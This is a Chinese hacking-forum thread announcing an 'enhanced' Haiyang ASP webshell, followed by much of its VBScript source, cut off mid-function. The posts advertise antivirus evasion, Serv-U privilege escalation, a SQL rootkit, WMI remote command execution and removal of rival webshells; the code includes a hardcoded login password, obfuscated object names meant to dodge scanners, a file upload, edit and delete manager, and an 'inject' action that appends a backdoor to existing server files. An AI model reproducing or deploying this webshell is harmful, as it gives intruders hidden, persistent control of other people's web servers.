[原创]海洋顶端ASP木马增强版
文章作者:TTFCT [E.S.T]信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
这段时间忙于简历和双选,好久都没有搞ASP马了,这是我前段时间修改的一个海洋,高手请勿见笑:)
功能如下:
1:
修正了HACK520修改的海洋的几个BUG,同时进行了免杀,我测试时杀软不再杀
2:
加入了过LAKE2最新助手的功能
3:
新增功能如下:
ADO.Stream文件浏览操作器
SqlRootKit 3.0
wmi远程执行命令
SerV-U-ASP提权
干掉非本人ASP木马
4:
运行后界面如下图:
[img]http://www.4itjob.com/js/1.jpg.bmp[/img]
5:
登陆方式 ?zxzgcn=login pwd:ttfct KV2006免杀失败!!!
咔吧可过!!!
你的软件??? 当时没有试KV,但瑞星和卡8没有问题 能不能过KV好象无所谓吧,服务器好象装KV的不是很多。。。。 结构正常,也比较干净, 但是打开mdb数据表看记录的时候maxthon死掉了
里面有个alexa的统计,报告完毕 ADO.Stream文件浏览操作器
SqlRootKit 3.0
wmi远程执行命令
这三个猪三哥里边是有的。如把打包修改下就好了。在组件探测继续增加,把goldsun的ado也加的。免杀是没必要做的。自己做就可以。
KV不是少数。 ado.srteam和里边的原有的shell.applaction应当是重复了.
另外,海阳2006+里边的数据库命令里可以直接执行所有的sql命令的(带回显),原来的2006不带.
2006+有asp程序扩展接口,里边自带了一个wmi执行命令示例的.其它的asp程序自然都可以运行. 建议把没加密的也放出来. 楼上的
想要原版就自己解密
所学所用 asp中的ENCODE,非常easy
之所以没有放示加密的出来,是为了躲过LAKE2的那个~:) 我貌似不能登陆上去。。昏迷。传上去了。不能登陆。。 挂统计就会看到文件来源了,等于帮LZ收集WEBSHELL了,扔进垃圾筒! 工具的确不错。 。呵呵。。不过我在上传开3389的文件时提示
错误: 写入文件失败。
错误源: ADODB.Stream
谁知道有没有解决的办法?
PS:不知道这个问题问在这里合适不。 [s:65] [s:75] 其实这个版本早在我手里了。。ado.srteam和里边的原有的shell.applaction应当是重复了.
NO NO NO,调用的组件不同撒。。 [s:75],还有一点就是马比较肥,2003系统下,用小马可以直接保存,2000系统下用小马不能直接保存的。大家使用的时候注意下。 [quote][b]这里是引用第[/b][color=#ff0000][5 楼][/color][b]的[color=#000066]k2k[/color]于[/b]2006-09-20 11:43[b]发表的:[/b]
里面有个alexa的统计,报告完毕[/quote]
当时没有在意,自己解密后去掉 猪三兄的东西作的增加和修改,当时没想过有什么统计的,就没在意 [quote][b]这里是引用第[/b][color=#ff0000][10 楼][/color][b]的[color=#000066]爆竹的孤独[/color]于[/b]2006-09-20 18:45[b]发表的:[/b]
楼主用什么加壳软件/[/quote]
北斗 4.5 你信不 . ?
其实还是建议楼主 你把没加密的 发布出来`! [quote][b]这里是引用第[/b][color=#ff0000][0 楼][/color][b]的[color=#000066]zxzgcn[/color]于[/b]2006-09-20 08:43[b]发表的:[/b][原创]海洋顶端ASP木马增强版
文章作者:TTFCT [E.S.T]
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
这段时间忙于简历和双选,好久都没有搞ASP马了,这是我前段时间修改的一个海洋,高手请勿见笑:)
功能如下:
.......[/quote]
呵呵,你终于还是放出来了,。。。我还以为你不会公布的 。。早知道我就送几个给我朋友好了,我都没舍得给 <%@ LANGUAGE = 'VBScript' %>
<%
Dim theAct, sTime, aspPath, zxzgcn, strBackDoor, fsoX, saX, wsX
sTime = Timer
theAct= Request("theAct")
zxzgcn = Request("zxzgcn")
aspPath = Server.MapPath(".")
Const m = "zxzgcn"
Const showLogin = "login"
Const clientPassword = "#"
Const dbSelectNumber = 10
Const isDebugMode = False
Const myName = "GET IN"
Const notdownloadsExists = False
Const userPassword = "ttfct"
Const MyCmdDoTExeFiLe = "cOmmaNd.coM"
ConSt strJSCloSeMe = "<inPut tYpe=butTon vAluE=' 关闭 ' onClick='wiNdow.cloSe();'>"
Sub creAteIT(fSoX, SaX, wSX)
If isDebugMode = False Then
On Error Resume Next
End If
Set fsoX = Server.CreateObject("Scripting.FileSy"&x&"stemObject")
If IsEmpty(fsoX) And (zxzgcn = "FsoFile"&x&"Explorer" Or theAct = "fsoSe"&x&"arch") Then
Set fsoX = fso
End If
Set saX = Server.CreateObject("Shell.Ap"&x&"plication")
If IsEmpty(saX) And (zxzgcn = "AppFileExplorer" Or zxzgcn = "Sa"&x&"CmdRun" Or theAct = "saSe"&x&"arch") Then
Set saX = sa
End If
Set wsX = Server.CreateObject("WScrip"&x&"t.Shell")
If IsEmpty(wsX) And (zxzgcn = "WsCm"&x&"dRun" Or theAct = "getTermina"&x&"lInfo" Or theAct = "readR"&x&"eg") Then
Set wsX = ws
End If
If Err Then
Err.Clear
End If
End Sub
Sub chkErr(Err)
If Err Then
echo "<style>body{margin:8;border:none;overflow:hidden;background-color:buttonface;}</style>"
echo "<br/><font size=2><li>错误: " & Err.Description & "</li><li>错误源: " & Err.Source & "</li><br/>"
echo "<hr></font>"
Err.Clear
Response.End
End If
End Sub
Sub echo(str)
Response.Write(str)
End Sub
Sub isIn()
If zxzgcn <> "" And zxzgcn <> "login" And zxzgcn <> showLogin Then
If Session(m & "userPassword") <> userPassword Then
Response.End
End If
End If
End Sub
Sub showTitle(str)
echo "<title>" & str & " </title>" & vbNewLine
echo "<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>" & vbNewLine
echo "" & vbNewLine
PageOther()
End Sub
Function fixNull(str)
If IsNull(str) Then
str = " "
End If
fixNull = str
End Function
Function encode(str)
str = Server.HTMLEncode(str)
str = Replace(str, vbNewLine, "<br>")
str = Replace(str, " ", " ")
str = Replace(str, " ", " ")
encode = str
End Function
Function getTheSize(theSize)
If theSize >= (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G"
If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M"
If theSize >= 1024 And theSize < (1024 * 1024) Then getTheSize = Fix((theSize / 1024) * 100) / 100 & "K"
If theSize >= 0 And theSize <1024 Then getTheSize = theSize & "B"
End Function
Function HtmlEncode(str)
If isNull(str) Then
Exit Function
End If
HtmlEncode = Server.HTMLEncode(str)
End Function
Function UrlEncode(str)
If isNull(str) Then
Exit Function
End If
UrlEncode = Server.UrlEncode(str)
End Function
Sub redirectTo(strUrl)
Response.Redirect(Request.ServerVariables("URL") & strUrl)
End Sub
Function trimThePath(strPath)
If Right(strPath, 1) = "\" And Len(strPath) > 3 Then
strPath = Left(strPath, Len(strPath) - 1)
End If
trimThePath = strPath
End Function
Sub alertThenClose(strInfo)
Response.Write "<script>alert(""" & strInfo & """);window.close();</script>"
End Sub
Sub showErr(str)
Dim i, arrayStr
str = Server.HtmlEncode(str)
arrayStr = Split(str, "$$")
' Response.Clear
echo "<font size=2>"
echo "出错信息:<br/><br/>"
For i = 0 To UBound(arrayStr)
echo " " & (i + 1) & ". " & arrayStr(i) & "<br/>"
Next
echo "</font>"
Response.End
End Sub
isIn()
Call createIt(fsoX, saX, wsX)
Select Case zxzgcn
Case showLogin, "login"
PageLogin()
Case "PageList"
PageList()
Case "objOnSrv"
PageObjOnSrv()
Case "ServiceList"
PageServiceList()
Case "userList"
PageUserList()
Case "CSInfo"
PageCSInfo()
Case "infoAboutSrv"
PageInfoAboutSrv()
Case "AppFileExplorer"
PageAppFileExplorer()
Case "SaCmdRun"
PageSaCmdRun()
Case "WsCmdRun"
PageWsCmdRun()
Case "FsoFileExplorer"
PageFsoFileExplorer()
Case "MsDataBase"
PageMsDataBase()
Case "OtherTools"
PageOtherTools()
Case "TxtSearcher"
PageTxtSearcher()
Case "PageAddToMdb"
PageAddToMdb()
Case "mycom"
mycom()
End Select
Set saX = Nothing
Set wsX = Nothing
Set fsoX = Nothing
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Rem 下面是各独立功能模块
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Sub PageAppFileExplorer()
Response.Buffer = True
If isDebugMode = False Then
On Error Resume Next
End If
Dim strExtName, thePath, objFolder, objMember, strDetails, strPath, strNewName
Dim intI, theAct, strTmp, strFolderList, strFileList, strFilePath, strFileName, strParentPath
showTitle("She"&T&"ll.Appl"&T&"ication文件浏览器(&stream)")
theAct = Request("theAct")
strNewName = Request("newName")
thePath = Replace(LTrim(Request("thePath")), "\\", "\")
If theAct <> "upload" Then
If Request.Form.Count > 0 Then
theAct = Request.Form("theAct")
thePath = Replace(LTrim(Request.Form("thePath")), "\\", "\")
End If
End If
echo "<style>body{margin:8;}</style>"
Select Case theAct
Case "openUrl"
openUrl(thePath)
Case "showEdit"
Call showEdit(thePath, "stream")
Case "saveFile"
Call saveToFile(thePath, "stream")
Case "copyOne", "cutOne"
If thePath = "" Then
alertThenClose("参数错误!")
Response.End
End If
Session(m & "appThePath") = thePath
Session(m & "appTheAct") = theAct
alertThenClose("操作成功,请粘贴!")
Case "pastOne"
appDoPastOne(thePath)
alertThenClose("粘贴成功,请刷新本页查看效果!")
Case "rename"
appRenameOne(thePath)
Case "downTheFile"
downTheFile(thePath)
Case "theAttributes"
appTheAttributes(thePath)
Case "showUpload"
Call showUpload(thePath, "AppFileExplorer")
Case "upload"
streamUpload(thePath)
Call showUpload(thePath, "AppFileExplorer")
Case "inject"
strTmp = streamLoadFromFile(thePath)
fsoSaveToFile thePath, strTmp & strBackDoor
alertThenClose("插入成功!")
End Select
If theAct <> "" Then
Response.End
End If
Set objFolder = saX.NameSpace(thePath)
If Request.Form.Count > 0 Then
redirectTo("?zxzgcn=AppFileExplorer&thePath=" & UrlEncode(thePath))
End If
echo "<input type=hidden name=usePath /><input type=hidden value=AppFileExplorer name=zxzgcn />"
echo "<input type=hidden value=""" & HtmlEncode(thePath) & """ name=truePath />"
echo "<div style='left:0px;width:100%;height:48px;position:absolute;top:2px;' id=fileExplorerTools>"
echo "<input type=button value=' 打开 ' onclick='openUrl();'>"
echo "<input type=button value=' 编辑 ' onclick='editFile();'>"
echo "<input type=button value=' 复制 ' onclick=appDoAction('copyOne');>"
echo "<input type=button value=' 剪切 ' onclick=appDoAction('cutOne');>"
echo "<input type=button value=' 粘贴 ' onclick=appDoAction2('pastOne');>"
echo "<input type=button value=' 上传 ' onclick='upTheFile();'>"
echo "<input type=button value=' 下载 ' onclick='downTheFile();'>"
echo "<input type=button value=' 属性 ' onclick='appTheAttributes();'>"
echo "<input type=button value=' 插入 ' onclick=appDoAction('inject');>"
echo "<input type=button value='重命名' onclick='appRename();'>"
echo "<input type=button value='我的电脑' onclick=location.href='?zxzgcn=AppFileExplorer&thePath='>"
echo "<input type=button value='控制面板' onclick=location.href='?zxzgcn=AppFileExplorer&thePath=::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\::{21EC2020-3AEA-1069-A2DD-08002B30309D}'>"
echo "<form method=post action='?zxzgcn=AppFileExplorer'>"
echo "<input type=button value=' 后退 ' onclick='this.disabled=true;history.back();' />"
echo "<input type=button value=' 前进 ' onclick='this.disabled=true;history.go(1);' />"
echo "<input type=button value=站点根 onclick=location.href=""?zxzgcn=AppFileExplorer&thePath=" & URLEncode(Server.MapPath("\")) & """;>"
echo "<input style='width:60%;' name=thePath value=""" & HtmlEncode(thePath) & """ />"
echo "<input type=submit value=' GO.' /><input type=button value=' 刷新 ' onclick='location.reload();'></form><hr/>"
echo "</div><div style='height:50px;'></div>"
echo "<script>fixTheLayer('fileExplorerTools');setInterval(""fixTheLayer('fileExplorerTools');"", 200);</script>"
For Each objMember In objFolder.Items
intI = intI + 1
If intI > 200 Then
intI = 0
Response.Flush()
End If
If objMember.IsFolder = True Then
If Left(objMember.Path, 2) = "::" Then
strPath = URLEncode(objMember.Path)
Else
strPath = URLEncode(objMember.Path) & "%5C"
End If
strFolderList = strFolderList & "<span id=""" & strPath & """ ondblclick='changeThePath(this);' onclick='changeMyClass(this);'><font class=font face=Wingdings>0</font><br/>" & objMember.Name & "</span>"
Else
strDetails = objFolder.GetDetailsOf(objMember, -1)
strFilePath = objMember.Path
strFileName = Mid(strFilePath, InStrRev(strFilePath, "\") + 1)
strExtName = Split(strFileName, ".")(UBound(Split(strFileName, ".")))
strFileList = strFileList & "<span title=""" & strDetails & """ ondblclick='openUrl();' id=""" & URLEncode(strFilePath) & """ onclick='changeMyClass(this);'><font class=font face=" & getFileIcon(strExtName) & "</font><br/>" & strFileName & "</span>"
End If
Next
chkErr(Err)
strParentPath = getParentPath(thePath)
If thePath <> "" And Left(thePath, 2) <> "::" Then
strFolderList = "<span id=""" & URLEncode(strParentPath) & """ ondblclick='changeThePath(this);' onclick='changeMyClass(this);'><font class=font face=Wingdings>0</font><br/>..</span>" & strFolderList
End If
echo "<div id=FileList>"
echo strFolderList & strFileList
echo "</div>"
echo "<hr/>"
Set objFolder = Nothing
End Sub
Function getParentPath(strPath)
If Right(strPath, 1) = "\" Then
strPath = Left(strPath, Len(strPath) - 1)
End If
If Len(strPath) = 2 Then
getParentPath = " "
Else
getParentPath = Left(strPath, InStrRev(strPath, "\"))
End If
End Function
Function streamSaveToFile(thePath, fileContent)
Dim stream
If isDebugMode = False Then
On Error Resume Next
End If
Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
With stream
.Type=2
.Mode=3
.Open
chkErr(Err)
.Charset="gb2312"
.WriteText fileContent
.saveToFile thePath, 2
.Close
End With
Set stream = Nothing
End Function
Sub appDoPastOne(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim strAct, strPath
dim objTargetFolder
strAct = Session(m & "appTheAct")
strPath = Session(m & "appThePath")
If strAct = "" Or strPath = "" Then
alertThenClose("参数错误,粘贴前请先复制/剪切!")
Exit Sub
End If
If InStr(LCase(thePath), LCase(strPath)) > 0 Then
alertThenClose("目标文件夹在源文件夹内,非法操作!")
Exit Sub
End If
strPath = trimThePath(strPath)
thePath = trimThePath(thePath)
Set objTargetFolder = saX.NameSpace(thePath)
If strAct = "copyOne" Then
objTargetFolder.CopyHere(strPath)
Else
objTargetFolder.MoveHere(strPath)
End If
chkErr(Err)
Set objTargetFolder = Nothing
End Sub
Sub appTheAttributes(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, strSth, objFolder, objItem, strModifyDate
strModifyDate = Request("ModifyDate")
thePath = trimThePath(thePath)
If thePath = "" Then
alertThenClose("没有选择任何文件(夹)!")
Exit Sub
End If
strSth = Left(thePath, InStrRev(thePath, "\"))
Set objFolder = saX.NameSpace(strSth)
chkErr(Err)
strSth = Split(thePath, "\")(UBound(Split(thePath, "\")))
Set objItem = objFolder.ParseName(strSth)
chkErr(Err)
If isDate(strModifyDate) Then
objItem.ModifyDate = strModifyDate
alertThenClose("修改成功!")
Set objItem = Nothing
Set objFolder = Nothing
Exit Sub
End If
' strSth = objFolder.GetDetailsOf(objItem, -1)
' strSth = Replace(strSth, chr(10), "<br/>")
For i = 1 To 8
strSth = strSth & "<br/>属性(" & i & "): " & objFolder.GetDetailsOf(objItem, i)
Next
strSth = Replace(strSth, "属性(1)", "大小")
strSth = Replace(strSth, "属性(2)", "类型")
strSth = Replace(strSth, "属性(3)", "最后修改")
strSth = Replace(strSth, "属性(8)", "所有者")
strSth = strSth & "<form method=post>"
strSth = strSth & "<input type=hidden name=theAct value=theAttributes>"
strSth = strSth & "<input type=hidden name=thePath value=""" & thePath & """>"
strSth = strSth & "<br/>最后修改: <input size=30 value='" & objFolder.GetDetailsOf(objItem, 3) & "' name=ModifyDate />"
strSth = strSth & "<input type=submit value=' 修改 '>"
strSth = strSth & "</form>"
echo strSth
Set objItem = Nothing
Set objFolder = Nothing
End Sub
Sub appRenameOne(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim strSth, fileName, objItem, objFolder
fileName = Request("fileName")
thePath = trimThePath(thePath)
strSth = Left(thePath, InStrRev(thePath, "\"))
Set objFolder = saX.NameSpace(strSth)
chkErr(Err)
strSth = Split(thePath, "\")(UBound(Split(thePath, "\")))
Set objItem = objFolder.ParseName(strSth)
chkErr(Err)
strSth = Split(thePath, ".")(UBound(Split(thePath, ".")))
If fileName <> "" Then
objItem.Name = fileName
chkErr(Err)
alertThenClose("重命名成功,刷新本页可以看到效果!")
Set objItem = Nothing
Set objFolder = Nothing
Exit Sub
End If
echo "<form method=post>重命名:"
echo "<input type=hidden name=theAct value=rename>"
echo "<input type=hidden name=thePath value=""" & thePath & """>"
echo "<br/><input size=30 value=""" & objItem.Name & """ name=fileName />"
If InStr(strSth, ":") <= 0 Then
echo "." & strSth
End If
echo "<hr/><input type=submit value=' 修改 '>" & strJsCloseMe
echo "</form>"
Set objItem = Nothing
Set objFolder = Nothing
End Sub
Sub PageCSInfo()
If isDebugMode = False Then
On Error Resume Next
End If
Dim strKey, strVar, strVariable
showTitle("客户端服务器交互信息")
echo "<a href=javascript:showHideMe(ServerVariables);>ServerVariables:</a>"
echo "<span id=ServerVariables style='display:none;'>"
For Each strVariable In Request.ServerVariables
echo "<li>" & strVariable & ": " & Request.ServerVariables(strVariable) & "</li>"
Next
echo "</span>"
echo "<br/><a href=javascript:showHideMe(Application);>Application:</a>"
echo "<span id=Application style='display:none;'>"
For Each strVariable In Application.Contents
echo "<li>" & strVariable & ": " & Encode(Application(strVariable)) & "</li>"
If Err Then
For Each strVar In Application.Contents(strVariable)
echo "<li>" & strVariable & "(" & strVar & "): " & Encode(Application(strVariable)(strVar)) & "</li>"
Next
Err.Clear
End If
Next
echo "</span>"
echo "<br/><a href=javascript:showHideMe(Session);>Session:(ID" & Session.SessionId & ")</a>"
echo "<span id=Session style='display:none;'>"
For Each strVariable In Session.Contents
echo "<li>" & strVariable & ": " & Encode(Session(strVariable)) & "</li>"
Next
echo "</span>"
echo "<br/><a href=javascript:showHideMe(Cookies);>Cookies:</a>"
echo "<span id=Cookies style='display:none;'>"
For Each strVariable In Request.Cookies
If Request.Cookies(strVariable).HasKeys Then
For Each strKey In Request.Cookies(strVariable)
echo "<li>" & strVariable & "(" & strKey & "): " & HtmlEncode(Request.Cookies(strVariable)(strKey)) & "</li>"
Next
Else
echo "<li>" & strVariable & ": " & Encode(Request.Cookies(strVariable)) & "</li>"
End If
Next
echo "</span><hr/>"
End Sub
Sub PageFsoFileExplorer()
If isDebugMode = False Then
On Error Resume Next
End If
Response.Buffer = True
Dim file, drive, folder, theFiles, theFolder, theFolders
Dim i, theAct, strTmp, driveStr, thePath, parentFolderName
theAct = Request("theAct")
thePath = Request("thePath")
If theAct <> "upload" Then
If Request.Form.Count > 0 Then
theAct = Request.Form("theAct")
thePath = Request.Form("thePath")
End If
End If
showTitle("FSO文件浏览器(&stream)")
Select Case theAct
Case "newOne", "doNewOne"
fsoNewOne(thePath)
Case "showEdit"
Call showEdit(thePath, "fso")
Case "saveFile"
Call saveToFile(thePath, "fso")
Case "openUrl"
openUrl(thePath)
Case "copyOne", "cutOne"
If thePath = "" Then
alertThenClose("参数错误!")
Response.End
End If
Session(m & "fsoThePath") = thePath
Session(m & "fsoTheAct") = theAct
alertThenClose("操作成功,请粘贴!")
Case "pastOne"
fsoPastOne(thePath)
alertThenClose("粘贴成功,请刷新本页查看效果!")
Case "showFsoRename"
showFsoRename(thePath)
Case "doRename"
Call fsoRename(thePath)
alertThenClose("重命名成功,刷新后可以看到效果!")
Case "delOne", "doDelOne"
showFsoDelOne(thePath)
Case "getAttributes", "doModifyAttributes"
fsoTheAttributes(thePath)
Case "downTheFile"
downTheFile(thePath)
Case "showUpload"
Call showUpload(thePath, "FsoFileExplorer")
Case "upload"
streamUpload(thePath)
Call showUpload(thePath, "FsoFileExplorer")
Case "inject"
Set theFiles = fsoX.OpenTextFile(thePath)
strTmp = theFiles.ReadAll()
fsoSaveToFile thePath, strTmp & strBackDoor
Set theFiles = Nothing
alertThenClose("插入成功!")
End Select
If theAct <> "" Then
Response.End
End If
If Request.Form.Count > 0 Then
redirectTo("?zxzgcn=FsoFileExplorer&thePath=" & UrlEncode(thePath))
End If
parentFolderName = fsoX.GetParentFolderName(thePath)
echo "<div style='left:0px;width:100%;height:48px;position:absolute;top:2px;' id=fileExplorerTools>"
echo "<input type=button value=' 新建 ' onclick=newOne();>"
echo "<input type=button value=' 更名 ' onclick=fsoRename();>"
echo "<input type=button value=' 编辑 ' onclick=editFile();>"
echo "<input type=button value=' 打开 ' onclick=openUrl();>"
echo "<input type=button value=' 复制 ' onclick=appDoAction('copyOne');>"
echo "<input type=button value=' 剪切 ' onclick=appDoAction('cutOne');>"
echo "<input type=button value=' 粘贴 ' onclick=appDoAction2('pastOne')>"
echo "<input type=button value=' 属性 ' onclick=fsoGetAttributes();>"
echo "<input type=button value=' 插入 ' onclick=appDoAction('inject');>"
echo "<input type=button value=' 删除 ' onclick=delOne();>"
echo "<input type=button value=' 上传 ' onclick='upTheFile();'>"
echo "<input type=button value=' 下载 ' onclick='downTheFile();'>"
echo "<br/>"
echo "<input type=hidden value=FsoFileExplorer name=zxzgcn />"
echo "<input type=hidden value=""" & UrlEncode(thePath) & """ name=truePath>"
echo "<input type=hidden size=50 name=usePath>"
echo "<form method=post action=?zxzgcn=FsoFileExplorer>"
If parentFolderName <> "" Then
echo "<input value='↑向上' type=button onclick=""this.disabled=true;location.href='?zxzgcn=FsoFileExplorer&thePath=" & Server.UrlEncode(parentFolderName) & "';"">"
End If
echo "<input type=button value=' 后退 ' onclick='this.disabled=true;history.back();' />"
echo "<input type=button value=' 前进 ' onclick='this.disabled=true;history.go(1);' />"
echo "<input size=60 value=""" & HtmlEncode(thePath) & """ name=thePath>"
echo "<input type=submit value=' 转到 '>"
driveStr = "<option>盘符</option>"
driveStr = driveStr & "<option value='" & HtmlEncode(Server.MapPath(".")) & "'>.</option>"
driveStr = driveStr & "<option value='" & HtmlEncode(Server.MapPath("/")) & "'>/</option>"
For Each drive In fsoX.Drives
driveStr = driveStr & "<option value='" & drive.DriveLetter & ":\'>" & drive.DriveLetter & ":\</option>"
Next
echo "<input type=button value=' 刷新 ' onclick='location.reload();'> "
echo "<select onchange=""this.form.thePath.value=this.value;this.form.submit();"">" & driveStr & "</select>"
echo "<hr/></form>"
echo "</div><div style='height:50px;'></div>"
echo "<script>fixTheLayer('fileExplorerTools');setInterval(""fixTheLayer('fileExplorerTools');"", 200);</script>"
If fsoX.FolderExists(thePath) = False Then
showErr(thePath & " 目录不存在或者不允许访问!")
End If
Set theFolder = fsoX.GetFolder(thePath)
Set theFiles = theFolder.Files
Set theFolders = theFolder.SubFolders
echo "<div id=FileList>"
For Each folder In theFolders
i = i + 1
If i > 50 Then
i = 0
Response.Flush()
End If
strTmp = UrlEncode(folder.Path & "\")
echo "<span id='" & strTmp & "' onDblClick=""changeThePath(this);"" onclick=changeMyClass(this);><font class=font face=Wingdings>0</font><br/>" & folder.Name & "</span>" & vbNewLine
Next
Response.Flush()
For Each file In theFiles
i = i + 1
If i > 100 Then
i = 0
Response.Flush()
End If
echo "<span id='" & UrlEncode(file.Path) & "' title='类型: " & file.Type & vbNewLine & "大小: " & getTheSize(file.Size) & "' onDblClick=""openUrl();"" onclick=changeMyClass(this);><font class=font face=" & getFileIcon(fsoX.GetExtensionName(file.Name)) & "</font><br/>" & file.Name & "</span>" & vbNewLine
Next
echo "</div>"
chkErr(Err)
echo "<hr/>"
End Sub
Sub fsoNewOne(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim theAct, isFile, theName, newAct
isFile = Request("isFile")
newAct = Request("newAct")
theName = Request("theName")
If newAct = " 确定 " Then
thePath = Replace(thePath & "\" & theName, "\\", "\")
If isFile = "True" Then
Call fsoX.CreateTextFile(thePath, False)
Else
fsoX.CreateFolder(thePath)
End If
chkErr(Err)
alertThenClose("文件(夹)新建成功,刷新后就可以看到效果!")
Response.End
End If
echo "<style>body{overflow:hidden;}</style>"
echo "<body topmargin=2>"
echo "<form method=post>"
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """><br/>新建: "
echo "<input type=radio name=isFile id=file value='True' checked><label for=file>文件</label> "
echo "<input type=radio name=isFile id=folder value='False'><label for=folder>文件夹</label><br/>"
echo "<input size=38 name=theName><hr/>"
echo "<input type=hidden name=theAct value=doNewOne>"
echo "<input type=submit name=newAct value=' 确定 '>" & strJsCloseMe
echo "</form>"
echo "</body><br/>"
End Sub
Sub fsoPastOne(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim sessionPath
sessionPath = Session(m & "fsoThePath")
If thePath = "" Or sessionPath = "" Then
alertThenClose("参数错误!")
Response.End
End If
If Right(thePath, 1) = "\" Then
thePath = Left(thePath, Len(thePath) - 1)
End If
If Right(sessionPath, 1) = "\" Then
sessionPath = Left(sessionPath, Len(sessionPath) - 1)
If Session(m & "fsoTheAct") = "cutOne" Then
Call fsoX.MoveFolder(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
Else
Call fsoX.CopyFolder(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
End If
Else
If Session(m & "fsoTheAct") = "cutOne" Then
Call fsoX.MoveFile(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
Else
Call fsoX.CopyFile(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
End If
End If
chkErr(Err)
End Sub
Sub fsoRename(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim theFile, fileName, theFolder
fileName = Request("fileName")
If thePath = "" Or fileName = "" Then
alertThenClose("参数错误!")
Response.End
End If
If Right(thePath, 1) = "\" Then
Set theFolder = fsoX.GetFolder(thePath)
theFolder.Name = fileName
Set theFolder = Nothing
Else
Set theFile = fsoX.GetFile(thePath)
theFile.Name = fileName
Set theFile = Nothing
End If
chkErr(Err)
End Sub
Sub showFsoRename(thePath)
Dim theAct, fileName
fileName = fsoX.getFileName(thePath)
echo "<style>body{overflow:hidden;}</style>"
echo "<body topmargin=2>"
echo "<form method=post>"
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """><br/>更名为:<br/>"
echo "<input size=38 name=fileName value=""" & HtmlEncode(fileName) & """><hr/>"
echo "<input type=submit value=' 确定 '>"
echo "<input type=hidden name=theAct value=doRename>"
echo "<input type=button value=' 关闭 ' onclick='window.close();'>"
echo "</form>"
echo "</body><br/>"
End Sub
Sub showFsoDelOne(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim newAct, theFile
newAct = Request("newAct")
If newAct = "确认删除?" Then
If Right(thePath, 1) = "\" Then
thePath = Left(thePath, Len(thePath) - 1)
Call fsoX.DeleteFolder(thePath, True)
Else
Call fsoX.DeleteFile(thePath, True)
End If
chkErr(Err)
alertThenClose("文件(夹)删除成功,刷新后就可以看到效果!")
Response.End
End If
echo "<style>body{margin:8;border:none;overflow:hidden;background-color:buttonface;}</style>"
echo "<form method=post><br/>"
echo HtmlEncode(thePath)
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """>"
echo "<input type=hidden name=theAct value=doDelOne>"
echo "<hr/><input type=submit name=newAct value='确认删除?'><input type=button value=' 关闭 ' onclick='window.close();'>"
echo "</form>"
End Sub
Sub fsoTheAttributes(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim newAct, theFile, theFolder, theTitle
newAct = Request("newAct")
If Right(thePath, 1) = "\" Then
Set theFolder = fsoX.GetFolder(thePath)
If newAct = " 修改 " Then
setMyTitle(theFolder)
End If
theTitle = getMyTitle(theFolder)
Set theFolder = Nothing
Else
Set theFile = fsoX.GetFile(thePath)
If newAct = " 修改 " Then
setMyTitle(theFile)
End If
theTitle = getMyTitle(theFile)
Set theFile = Nothing
End If
chkErr(Err)
theTitle = Replace(theTitle, vbNewLine, "<br/>")
echo "<style>body{margin:8;overflow:hidden;}</style>"
echo "<form method=post>"
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """>"
echo "<input type=hidden name=theAct value=doModifyAttributes>"
echo theTitle
echo "<hr/><input type=submit name=newAct value=' 修改 '>" & strJsCloseMe
echo "</form>"
End Sub
Function getMyTitle(theOne)
If isDebugMode = False Then
On Error Resume Next
End If
Dim strTitle
strTitle = strTitle & "路径: " & theOne.Path & "" & vbNewLine
strTitle = strTitle & "大小: " & getTheSize(theOne.Size) & vbNewLine
strTitle = strTitle & "属性: " & getAttributes(theOne.Attributes) & vbNewLine
strTitle = strTitle & "创建时间: " & theOne.DateCreated & vbNewLine
strTitle = strTitle & "最后修改: " & theOne.DateLastModified & vbNewLine
strTitle = strTitle & "最后访问: " & theOne.DateLastAccessed
getMyTitle = strTitle
End Function
Sub setMyTitle(theOne)
Dim i, myAttributes
For i = 1 To Request("attributes").Count
myAttributes = myAttributes + CInt(Request("attributes")(i))
Next
theOne.Attributes = myAttributes
chkErr(Err)
echo "<script>alert('该文件(夹)属性已按正确设置修改完成!');</script>"
End Sub
Function getAttributes(intValue)
Dim strAtt
strAtt = "<input type=checkbox name=attributes value=4 {$system}>系统 "
strAtt = strAtt & "<input type=checkbox name=attributes value=2 {$hidden}>隐藏 "
strAtt = strAtt & "<input type=checkbox name=attributes value=1 {$readonly}>只读 "
strAtt = strAtt & "<input type=checkbox name=attributes value=32 {$archive}>存档<br/> "
strAtt = strAtt & "<input type=checkbox name=attributes {$normal} value=0>普通 "
strAtt = strAtt & "<input type=checkbox name=attributes value=128 {$compressed}>压缩 "
strAtt = strAtt & "<input type=checkbox name=attributes value=16 {$directory}>文件夹 "
strAtt = strAtt & "<input type=checkbox name=attributes value=64 {$alias}>快捷方式"
' strAtt = strAtt & "<input type=checkbox name=attributes value=8 {$volume}>卷标 "
If intValue = 0 Then
strAtt = Replace(strAtt, "{$normal}", "checked")
End If
If intValue >= 128 Then
intValue = intValue - 128
strAtt = Replace(strAtt, "{$compressed}", "checked")
End If
If intValue >= 64 Then
